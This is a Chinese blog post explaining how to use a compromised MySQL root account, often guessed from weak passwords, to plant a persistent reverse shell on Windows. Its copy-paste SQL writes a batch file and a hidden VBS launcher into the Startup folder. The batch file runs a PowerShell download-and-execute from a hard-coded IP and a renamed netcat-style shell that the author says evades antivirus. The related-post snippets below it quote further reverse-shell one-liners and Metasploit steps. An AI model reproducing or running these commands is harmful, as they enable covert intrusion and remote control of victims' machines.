windows 已拿到mysql权限最简单的反弹shell方式

最新推荐文章于 2024-05-19 10:11:12 发布
最新推荐文章于 2024-05-19 10:11:12 发布
阅读量630 收藏 2
点赞数
分类专栏: 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44195175/article/details/110678220
版权

大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了

  • 需要运行的是5.x版本的mysql (一般老师教学都是这个版本)
  • 对比网上powercat 脚本多了步把powercat替换成nn命令(需要的可以问我),这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动

服务器需要做的事

  1. 将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里)
  2. 服务器启动nc -l 2222 如果没有这条命令可以自行百度安装

然后登录目标mysql (复制粘贴)

create database te;
use te;
create table bat(text varchar(200));
create table vbs(text varchar(200));
insert into bat value(':start
powershell IEX (New-Object System.Net.Webclient).DownloadString(\'http://111.229.235.155/windows.ps1#这里将ps1脚本替换成你的ps1脚本\');nn  -c 111.229.235.155(你的服务器ip) -p 2222 -e cmd
timeout 60
goto start');
select*from bat into outfile "C:\\Windows\\wins.bat" FIELDS ESCAPED BY "`" lines terminated by '\r\n';
insert into vbs value('createobject("wscript.shell").run "C:\\Windows\\wins.bat",0');
select*from vbs into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\\Programs\\StartUp\\wins.vbs" FIELDS ESCAPED BY "`" lines terminated by '\r\n';
drop table bat;
drop table vbs;
drop database te;
YZBPXX
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1392
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
mysql root getshell_[猥琐姿势]利用MySQL的root账号从而快速GetShell
weixin_30229479的博客
01-19 630
*本文注重分享,切勿用作非法用途今天给大家介绍通过mysql的root账号来get shell的猥琐方法,写的不是很详细,但图配了不少,大家应该是会看得懂了今天的场景是前一周在内网渗透的时候遇到过的,找到一个mysql数据库弱口令。账号和密码分别是root,也就是mysql中的dba。这里其实权限很大了,首先mysql的root用户具有文件写权限,同时mysql5.0以上,提供一个system函数...
玄机-第二章日志分析-mysql应急响应
JACKBREAK的博客
05-19 1375
玄机应急响应靶场日记
mysql 反弹shell_mysql mof+metasploit反弹shell
weixin_35895056的博客
01-27 761
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx//设置登录mysql的密码setusernamexxx//设置登录mysql的用户setrhostxx...
mysql反弹shell
weixin_40416851的博客
02-10 739
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网。
mysql 反弹shell_Discuz-ssrf利用计划任务反弹shell
weixin_39634898的博客
01-27 243
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人...
mysql反弹shell_MySQL Rootkit 反弹Shell--PHP
weixin_39520013的博客
01-19 288
好多人在渗透的时候,知道得到了SA的密码知道该怎么办,但是得到了MYSQL的root密码之后却迷茫了(多说句废话,默认在windows文件夹中保存my.ini里面写有root密码,而且windows有访问的权限,我们学校的服务器就是这么搞到的,汗···),我当初就迷茫过。后来得知用UDF create新函数可以执行命令,但是有时候却会出现意外的情况等等利用不是很好。终于有一天JOLI大叔随手抛给我...
mysql-shellmysql-shell-8.4.0-windows-x86-64bit.zip
最新发布
05-26
1. **多语言支持**:MySQL Shell 支持SQL、JavaScript和Python三种编程语言,允许用户根据个人喜好或项目需求选择最适合的语言进行数据库操作。 2. **自动完成和提示**:在Shell中,用户可以享受到自动补全和语法...
shell简单处理mysql查询结果的方法
09-09
这篇关于“shell简单处理mysql查询结果的方法”的文章旨在介绍如何在shell脚本中有效地处理MySQL查询返回的数据。 首先,我们需要理解shell脚本中的数组和字符串特性。在shell中,数组可以用来存储一组相关的值,...
一个简单MySQL备份Shell脚本
09-10
本文将详细解析提供的简单MySQL备份Shell脚本,它包含了全量备份和增量备份的策略。 首先,脚本开始部分定义了一个bash shell环境,用`#!/bin/bash`作为执行环境声明。然后检查是否存在备份目录`/mydata/data1/...
mysql查询结果保存到文件的shell脚本
09-10
3. 提供了一种自动化的方式,方便定期或按需备份MySQL数据到文件。 这样的脚本对于系统管理员来说非常有用,因为它可以轻松集成到更复杂的自动化流程中,例如定时任务或者与其他脚本协同工作,实现数据库数据的自动...
mysql_reverse_udf.zip
08-02
mysql反弹端口提权利用dll文件。
shell脚本实现mysql从原表到历史表数据迁移
09-17
这里我们关注的是使用Shell脚本来实现MySQL从原表到历史表的数据迁移。这种自动化的方法可以帮助我们高效、准确地处理大量数据,同时减少人为错误。 首先,让我们深入理解`shell`脚本。Shell是Linux和Unix系统中的...
mysql 反弹shell_反弹shell升级成交互式shell
weixin_39640573的博客
01-27 591
实验环境:A : kali 虚拟机B: centos7.5 虚拟机1. A 机 kali 虚拟机 设置监听 端口root@kali64:~# nc -lvvp 9001# 端口随便定义,没被使用就行2. B机 执行命令反弹shell[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1# ip地...
mysql 反弹shell_golang反弹shell脚本
weixin_31293685的博客
01-27 220
一、Golang语言package mainimport ("fmt""net""strings""io/ioutil""log""os/exec")func cmd_connect(c net.Conn) {if c == nil {return}buf := make([]byte, 4096)for {cnt, err := c.Read(buf)if err != nil || cnt =...
mysql反弹shell_mysql mof+metasploit反弹shell
weixin_39875805的博客
02-02 144
鉴于上篇文章http://z2ppp.blog.51cto.com/11186185/1975985mysql mof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mofsetpasswordxxx...
mysql mof+metasploit反弹shell
weixin_33890526的博客
10-25 501
鉴于上篇文章http://z2ppp.blog.51cto.com/11186185/1975985mysql mof提权metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网useexploit/windows/mysql/mysql_mof setp...
Mysql提权之反弹shell
热门推荐
weixin_43801718的博客
04-13 3万+
0x01 介绍 Mysql反弹shell提权,也是属于udf提权,只不过应用场景不同,例如没有得到webshell,但是获得了Mysql的root密码,恰好目标的数据库可以外连,那么就可以先将udf.dll文件的内容先插入到数据表中,然后再导出到’lib/plugin’ 0x02 适用场景 取较高权限的,比如获取webshell,或者获取到webshell无法执行高权限命令的。特别是有了SQL执行...
Windows Server 2016上MySQL数据库的客户端访问与权限设置
本文档主要介绍了如何在Windows Server 2016环境下客户端访问MySQL数据库,包括创建和管理数据库用户、设置防火墙规则以及执行基本的数据操作。以下是详细步骤和知识点: 1. **创建MySQL用户及远程访问权限** - 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值